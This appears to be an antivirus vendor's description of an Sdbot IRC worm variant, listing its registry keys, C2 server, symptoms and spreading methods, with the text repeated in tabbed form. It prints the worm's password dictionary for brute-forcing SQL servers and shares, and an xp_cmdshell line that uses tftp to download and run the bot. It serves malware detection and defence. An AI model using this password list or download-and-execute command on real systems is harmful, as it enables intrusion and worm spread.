Content

W32/Sdbot.worm!54D1EEB9

Type
Internet Worm
SubType
Internet Relay Chat Worm
Discovery Date
04/25/2008
Length
102,376 bytes
Minimum DAT
5284 (04/29/2008)
Updated DAT
5291 (05/08/2008)
Minimum Engine
5.1.00
Description Added
04/25/2008
Description Modified
04/25/2008 9:46 AM (PT)
Risk Assessment
Corporate User
Low
Home User
Low

Tab Navigation

Characteristics

This is a variant of W32/Sdbot.worm which bears strong resemblance to the many other members of this rapidly growing family.

It bears the following characteristics:

  • propagates to machines vulnerable to the following exploits:
  • propagates to machines with poorly secured network shares (weak username/password combinations)
  • propagates to MySQL and Microsoft SQL servers that are poorly secured (again weak username/password combinations)
  • propagates to remote machines (it generates random IPs) by attempting to copy itself to a number of shares
  • provides a backdoor to the victim machine, thereby compromising data on that machine (significant remote access functionality is availble to the hacker)

 

Symptoms

When run, the bot installs itself into the Windows system directory using a random filename, for example:

  • C:\WINDOWS\system32\jkslnwyzs.exe

It adds itself as a service on the victim machine, the service configuration data stored within the following keys:

  • HKEY_LOCAL_MACHINE\Software\Windows\CurrentVersion\Run "Microsoft Getway Dire"
  • HKEY_LOCAL_MACHINE\Software\Windows\CurrentVersion\RunServices "Microsoft Getway Dire"

The bot attempts to connect to a remote IRC servers on TCP destination ports 9682. Users should note that the bot can be instructed to update which will almost certainly result in the bot connecting to a different server, and on a different port.

The server it attempts to connect to is:

  • trying.q8[removed].org

Other symptoms include:

  • opening oof local TCP port 113

removal of shares on the victim machine:

  • admin$
  • ipc$
  • d$
  • c$

Method of Infection

W32/Sdbot.worm!54D1EEB9 scans for vulnerable machines on the network, and uses the following Microsoft vulnerabilities to spread.

The bots scan for computers with an exposed port 1433 - the default MS SQL server port and attempts to create an SQL connection to that port. It tries to log on with the following usernames and password combinations:

12345
123456
1234567
12345678
123456789
1234567890
access
accounting
accounts
admin
administrador
administrat
administrateur
administrator
admins
backup
bitch
blank
brian
changeme
chris
cisco
compaq
control
database
databasepass
databasepassword
db1234
dbpass
dbpassword
default
domain
domainpass
domainpassword
exchange
george
guest
hello
homeuser
internet
internet
intranet
katie
linux
login
loginpass
nokia
oeminstall
oemuser
office
oracle
orainstall
outlook
pass1234
passwd
password
password1
peter
peter
qwerty
server
siemens
sqlpassoainstall
staff
student
susan
system
teacher
technical
win2000
win2k
win98
windows
winnt
winpass
winxp

If authentication is successful and the compromised SQL account has sufficient rights, the following SQL query is passed to "tftp.exe" to download and execute a copy of the bot via the following command:

DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s
EXEC master..xp_cmdshell 'tftp -i %s GET irn.exe&start irn.exe&exit

  • Weak password exploitation of network shares

The bot attempts to spread by finding improperly secured NetBios shares. It attempts to connect to computers with shared drives and tries the above listed combinations of passwords.

Removal

Detection is included in our BETA DAT files and will also be included in the next scheduled DAT release. In addition to the DAT version requirements for detection, the specified engine version (or greater) must also be used.

Additional Windows ME/XP removal considerations

Variants

Variants

    N/A

All Information

Overview -

W32/Sdbot.worm!54D1EEB9 is an internet relay chat controlled backdoor, which provides an attacker with unauthorized remote access to the compromised computer. An attacker can gain control over the compromised computer and use it to send spam, install adware or launch a DDos attack on internet systems.

There are multiple versions of the W32/Sdbot family of worms that use IRC (Internet Relay Chat) as a command and control mechanism. Such worms typically use exploits and weak password to spread to vulnerable machines on the network.

Characteristics

Characteristics -

This is a variant of W32/Sdbot.worm which bears strong resemblance to the many other members of this rapidly growing family.

It bears the following characteristics:

  • propagates to machines vulnerable to the following exploits:
  • propagates to machines with poorly secured network shares (weak username/password combinations)
  • propagates to MySQL and Microsoft SQL servers that are poorly secured (again weak username/password combinations)
  • propagates to remote machines (it generates random IPs) by attempting to copy itself to a number of shares
  • provides a backdoor to the victim machine, thereby compromising data on that machine (significant remote access functionality is availble to the hacker)

 

Symptoms

Symptoms -

When run, the bot installs itself into the Windows system directory using a random filename, for example:

  • C:\WINDOWS\system32\jkslnwyzs.exe

It adds itself as a service on the victim machine, the service configuration data stored within the following keys:

  • HKEY_LOCAL_MACHINE\Software\Windows\CurrentVersion\Run "Microsoft Getway Dire"
  • HKEY_LOCAL_MACHINE\Software\Windows\CurrentVersion\RunServices "Microsoft Getway Dire"

The bot attempts to connect to a remote IRC servers on TCP destination ports 9682. Users should note that the bot can be instructed to update which will almost certainly result in the bot connecting to a different server, and on a different port.

The server it attempts to connect to is:

  • trying.q8[removed].org

Other symptoms include:

  • opening oof local TCP port 113

removal of shares on the victim machine:

  • admin$
  • ipc$
  • d$
  • c$

Method of Infection

Method of Infection -

W32/Sdbot.worm!54D1EEB9 scans for vulnerable machines on the network, and uses the following Microsoft vulnerabilities to spread.

The bots scan for computers with an exposed port 1433 - the default MS SQL server port and attempts to create an SQL connection to that port. It tries to log on with the following usernames and password combinations:

12345
123456
1234567
12345678
123456789
1234567890
access
accounting
accounts
admin
administrador
administrat
administrateur
administrator
admins
backup
bitch
blank
brian
changeme
chris
cisco
compaq
control
database
databasepass
databasepassword
db1234
dbpass
dbpassword
default
domain
domainpass
domainpassword
exchange
george
guest
hello
homeuser
internet
internet
intranet
katie
linux
login
loginpass
nokia
oeminstall
oemuser
office
oracle
orainstall
outlook
pass1234
passwd
password
password1
peter
peter
qwerty
server
siemens
sqlpassoainstall
staff
student
susan
system
teacher
technical
win2000
win2k
win98
windows
winnt
winpass
winxp

If authentication is successful and the compromised SQL account has sufficient rights, the following SQL query is passed to "tftp.exe" to download and execute a copy of the bot via the following command:

DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s
EXEC master..xp_cmdshell 'tftp -i %s GET irn.exe&start irn.exe&exit

  • Weak password exploitation of network shares

The bot attempts to spread by finding improperly secured NetBios shares. It attempts to connect to computers with shared drives and tries the above listed combinations of passwords.

Removal -

Removal -

Detection is included in our BETA DAT files and will also be included in the next scheduled DAT release. In addition to the DAT version requirements for detection, the specified engine version (or greater) must also be used.

Additional Windows ME/XP removal considerations

Variants

Variants -

    N/A